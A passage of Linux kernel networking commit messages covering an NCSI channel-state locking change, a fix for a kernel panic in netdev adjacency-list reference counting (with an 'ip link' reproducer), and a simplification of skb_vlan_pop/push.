net/ncsi/ncsi-manage.c:202:3: note: in expansion of macro 'xchg'
xchg(&nc->state, NCSI_CHANNEL_INACTIVE);
This removes the atomic access to NCSI channel's state avoid the above
build warning. We have to hold the channel's lock when its state is readed
or updated. No functional changes introduced.
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
This is a respin of a patch to fix a relatively easily reproducible kernel
panic related to the all_adj_list handling for netdevs in recent kernels.
The following sequence of commands will reproduce the issue:
ip link add link eth0 name eth0.100 type vlan id 100
ip link add link eth0 name eth0.200 type vlan id 200
ip link add name testbr type bridge
ip link set eth0.100 master testbr
ip link set eth0.200 master testbr
ip link add link testbr mac0 type macvlan
ip link delete dev testbr
This creates an upper/lower tree of (excuse the poor ASCII art):
/---eth0.100-eth0
mac0-testbr-
\---eth0.200-eth0
When testbr is deleted, the all_adj_lists are walked, and eth0 is deleted twice from
the mac0 list. Unfortunately, during setup in __netdev_upper_dev_link, only one
reference to eth0 is added, so this results in a panic.
This change adds reference count propagation so things are handled properly.
Matthias Schiffer reported a similar crash in batman-adv:
https://github.com/freifunk-gluon/gluon/issues/680https://www.open-mesh.org/issues/247
which this patch also seems to resolve.
Signed-off-by: Andrew Collins <acollins@cradlepoint.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
skb_vlan_pop/push were too generic, trying to support the cases where
skb->data is at mac header, and cases where skb->data is arbitrarily
elsewhere.
Supporting an arbitrary skb->data was complex and bogus:
- It failed to unwind skb->data to its original location post actual
pop/push.
(Also, semantic is not well defined for unwinding: If data was into
the eth header, need to use same offset from start; But if data was
at network header or beyond, need to adjust the original offset
according to the push/pull)
- It mangled the rcsum post actual push/pop, without taking into account
that the eth bytes might already have been pulled out of the csum.
Most callers (ovs, bpf) already had their skb->data at mac_header upon
invoking skb_vlan_pop/push.
Last caller that failed to do so (act_vlan) has been recently fixed.
Therefore, to simplify things, no longer support arbitrary skb->data
inputs for skb_vlan_pop/push().
skb->data is expected to be exactly at mac_header; WARN otherwise.
Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Daniel Borkmann <daniel@iogearbox.net>
Cc: Pravin Shelar <pshelar@ovn.org>
Cc: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>